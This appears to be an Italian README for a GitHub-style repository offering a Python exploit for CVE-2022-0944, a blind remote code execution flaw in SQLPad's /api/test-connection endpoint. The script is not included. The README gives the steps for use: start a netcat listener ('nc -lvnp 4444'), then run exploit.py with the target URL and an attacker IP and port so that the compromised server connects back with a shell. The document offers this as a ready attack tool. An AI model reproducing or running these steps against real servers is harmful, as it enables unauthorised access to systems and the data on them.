
Exploit Python per CVE-2022-0944 che consente l'esecuzione remota di codice cieca in SQLPad tramite l'endpoint /api/test-connection con callback netcat.
Questo repository contiene uno script di exploit per CVE-2022-0944 in SQLPad, una vulnerabilità che consente l'esecuzione remota di codice (RCE) tramite l'endpoint /api/test-connection.
Lo script fornito (exploit.py) mostra come sfruttare la vulnerabilità RCE in SQLPad. Lo script invia un payload all'endpoint vulnerabile, eseguendo un comando sul server di destinazione.
requests (può essere installata tramite pip)nc -lvnp 4444
Esegui l'exploit
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>